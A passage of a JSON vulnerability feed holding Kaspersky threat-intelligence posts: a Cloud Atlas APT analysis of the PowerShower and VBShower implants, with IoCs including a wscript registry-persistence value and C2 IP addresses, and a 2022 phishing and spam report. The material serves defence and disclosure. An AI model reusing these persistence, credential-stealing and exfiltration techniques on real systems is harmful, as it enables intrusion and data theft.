"THREATPOST:D8172FCB461F5843B3391B2336A4D02F", 
"THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", 
"THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "score": {"value": -0.0, "vector": "NONE"}, "epss": [{"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998970000", "modified": "2023-03-17"}, {"cve": "CVE-2018-0802", "epss": "0.974870000", "percentile": "0.999430000", "modified": "2023-03-17"}], "vulnersScore": -0.0}, "_state": {"dependencies": 1660032824, "score": 1660035404, "epss": 1679178262}, "_internal": {"score_hash": "073b4c64a66be2d73a8eb732625a82e2"}}
{"securelist": [{"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor, mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high-value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high-profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victim - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. 
During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blog post (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences between the two versions lie mostly in the anti-forensics features of the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. 
\n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower, but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the open-source tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain, no longer relying on PowerShower directly after infection but instead executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each piece of code is unique per victim and so cannot be found via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy as the validator version of PowerShower. 
Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and, every hour, tries to retrieve via HTTP a VBS script from the remote server to execute.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor, which communicates with a cloud storage service via WebDAV.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. 
More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. 
The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered a chance to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the \"preview\", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users a chance to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. 
Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost over. A vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website invited users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. 
Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organizations to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were invited to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the \"charity\" found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the \"aid\" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. 
By getting the user's secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors a chance to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The \"giveaways\" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia's thirtieth anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the \"giveaways\". Users were invited to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that \"financial assistance\" is frequently promised by con artists to swindle you out of your money.\n\n\"Promotional campaigns by major banks\" were a popular bait in 2022. Visitors to a fraudulent web page were offered a one-time payment or a fee for taking a service quality survey. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. 
The cybercriminals used an array of techniques to lull victims' vigilance: company logos, assurances that the campaigns were legitimate, and detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)

Aid distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, while observers buy more than they normally do and may find themselves short of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of the foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts — nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them.
In addition to that, they might ask the victim to cover the "shipping costs".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)

Growing utility rates and an increase in the price of natural resources prompted several governments to start discussing compensation for the population. Payout notices could arrive by mail, email, or text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash to cover utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide that type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and to enter the details of the bank card linked to their account with the utility. The promise of £400 was supposed to make the victim drop their guard and share their personal information.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)

In Singapore, scammers offered a refund of water supply costs, purportedly because of double billing.
An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)

### Fake online stores and large vendor phishing

We see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted the customers of both globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)

"Insider" offers of "private sales" were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being the unrealistically low prices and the URL in the address bar not matching the official one.

Many large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing.
The risk associated with making a purchase was losing a substantial amount of money and never receiving what was ordered.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)

### Hijacking of social media accounts

Users of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but without the other party knowing. Cybercriminals who were after their account credentials offered victims a way to have their cake and eat it through some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls and track who had been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)

Many Instagram users dream of the Blue Badge, which marks a verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was enter their account login and password.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)

Russia blocked access to both Facebook and Instagram in March 2022, which caused the popularity of Russian social networks and Telegram to skyrocket. This increased usage meant the users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check whether Russian social media contained any embarrassing materials on the victim.
The scam operators told users it was possible to find damaging information on every third user of a social network by running a search. If the user agreed to have a search done for them, they were told that a certain amount of dirty linen had indeed been found. In reality, there was no search — the scammers simply stole the credentials they requested for the "check".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)

One of the added risks of social media phishing is scammers getting access both to the social media account itself and to any linked services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)

Telegram Premium status provides a range of benefits, from an ad-free experience to the ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge, or simply promised to give one away for free, if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)

One more phishing campaign targeting Telegram users was timed to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that displayed a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it.
The cybercriminals were betting on users going straight to voting without checking the authenticity of the drawings, which had been copied from various past years' competition pages, since requests to vote for one's friends' kids are common before public holidays.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)

Fragment, the Telegram auction platform selling unique usernames, went live in October 2022. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was asked to log in. If the victim entered their credentials, the scam operators immediately grabbed them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)

## Spam in 2022

### The pandemic

Unlike phishing, COVID-themed spam is still a thing. Most of it is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts and to improving the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even without being a Facebook user. Recipients are told that they can claim IMF money left unallocated because of the pandemic.
Others are offered hefty amounts under an anti-recession assistance program.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)

The amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk threefold by year end.

### Contact form spam

The year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites with registration, contact, or support request forms that do not require the user to be logged in to submit and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields; in others, they add a longer text with images to the message field. Then the attackers put victims' email addresses in the contact fields and submit. On receiving a message via a registration or contact form, most websites reply to the user's email address that their request has been received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)

Most scam messages offer the recipient compensation or a prize. For example, a spam email targeting Russian users promised the equivalent of $190–4200 in VAT refunds. To get the money, the victim was invited to open the link in the message. This scheme is a classic: the linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund.
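The contact-form relay above works only because the form accepts anything in its name field and the confirmation email echoes it back to whatever address was supplied. The following is an added example (not code from the report or from any particular website; the field names, limits and sample submissions are constructed) of closing both holes in a form handler: reject submissions whose name or login field carries a link or markup, and never copy submitter-supplied text into the auto-reply.

```python
"""Hardening a public contact/registration form against spam relaying.

Added example, not code from the report. All names, limits and sample
submissions below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Anything that looks like a link, a bare domain or markup has no business in
# a name or login field. (A name typed as "St.Petersburg" without a space would
# be caught too; that is an acceptable false positive for a public form.)
LINK_RE = re.compile(r"https?://\S+|www\.\S+|\b[a-z0-9-]+\.[a-z]{2,}\b", re.I)
MARKUP_RE = re.compile(r"<[^>]+>|\[[^\]]*\]\([^)]*\)")   # HTML tag or markdown link
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[a-z]{2,}$", re.I)
NAME_MAX_LEN = 80
MESSAGE_MAX_LEN = 4000
MESSAGE_MAX_LINKS = 2
# Letters (Latin and Cyrillic), spaces, apostrophes and hyphens only.
SAFE_NAME_RE = re.compile(r"[^A-Za-z\u00C0-\u024F\u0400-\u04FF '-]")


@dataclass
class Submission:
    name: str
    email: str
    message: str


def validate(sub: Submission) -> list:
    """Return the reasons to reject the submission; an empty list means accept."""
    reasons = []
    name = sub.name.strip()
    if not name or len(name) > NAME_MAX_LEN:
        reasons.append("name: empty or too long")
    if "\n" in name or "\r" in name:
        reasons.append("name: multi-line")
    if LINK_RE.search(name) or MARKUP_RE.search(name):
        reasons.append("name: contains a link or markup")
    if not EMAIL_RE.match(sub.email.strip()):
        reasons.append("email: malformed")
    if len(sub.message) > MESSAGE_MAX_LEN:
        reasons.append("message: too long")
    if len(LINK_RE.findall(sub.message)) > MESSAGE_MAX_LINKS:
        reasons.append("message: too many links")
    if MARKUP_RE.search(sub.message):
        reasons.append("message: contains markup")
    return reasons


def safe_name(name: str) -> str:
    """Reduce a name to plain letters, spaces, apostrophes and hyphens, capped in length."""
    return SAFE_NAME_RE.sub("", name).strip()[:40] or "there"


def auto_reply(sub: Submission) -> str:
    """Build the confirmation email. The submitter's message is never echoed and
    the name is reduced to plain letters, so even an accepted submission cannot
    turn the organization's own sender address into a spam relay."""
    return (
        f"Hello {safe_name(sub.name)},\n\n"
        "We have received your request and will get back to you within two business days.\n"
        "If you did not submit this form, please ignore this email."
    )


def process(sub: Submission) -> "tuple[bool, Optional[str]]":
    """Accept or reject the submission; only accepted ones get a confirmation.
    Rejected submissions are dropped silently: no email goes to the supplied address."""
    if validate(sub):
        return False, None
    return True, auto_reply(sub)


# Constructed samples: a genuine enquiry and a contact-form spam submission of
# the "VAT refund" kind described above. The domains are documentation names.
GENUINE = Submission("Anna Petrova", "anna.petrova@example.org",
                     "Hello, could you send me your price list? Thanks.")
SPAM = Submission("Your VAT refund of $4200 is waiting: http://vat-refund.example/claim",
                  "victim@example.net",
                  "Claim now at http://vat-refund.example/claim")

if __name__ == "__main__":
    for label, sub in (("genuine", GENUINE), ("spam", SPAM)):
        accepted, reply = process(sub)
        print(label, "->", "accepted" if accepted else f"rejected: {validate(sub)}")
        if reply:
            print(reply)
```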
We observed many varieties of contact form money scams, from fuel cards to offers to make money on some online platform.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)

Scammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" — in fact populated by bots — where the victims would no doubt be asked to pay for a premium account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)

We blocked upward of a million scam emails sent via legitimate forms in 2022.

### Blackmail in the name of law enforcement agencies

Extortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or received the threats in the form of an image with text. In addition, the geography of the mailings widened in 2022.

The essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient for allegedly visiting sites containing child pornography.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)

To avoid serious consequences, the attackers urged the victim to respond to the sender as soon as possible and "settle the matter". Most likely, in further correspondence the scammers would ask for a certain amount of money to be paid for the victim's name to be removed from the "criminal case".
In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.

### Exploiting the news

Spammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing that they transfer money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand that money be transferred to Bitcoin wallets, as it is more difficult to trace the recipient of a cryptocurrency transaction than of a bank one. Blackmail demanding payment in cryptocurrency used to prevail in spam; now attackers have started collecting Bitcoin for "charity".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)

The news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails in which fraudsters requested help on behalf of a Russian millionaire who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and that the email recipient might be lucky enough to get a piece of this pie.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)

More and more "business offers" are appearing among spam mailings, and they exploit the current information agenda. Because of the economic sanctions of 2022, enterprising businessmen offered replacements for goods and services from suppliers who had left the Russian market. For example, spammers actively advertised the services of a company transporting people to Russia.
The email text emphasized that many transport companies refused to provide such services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)

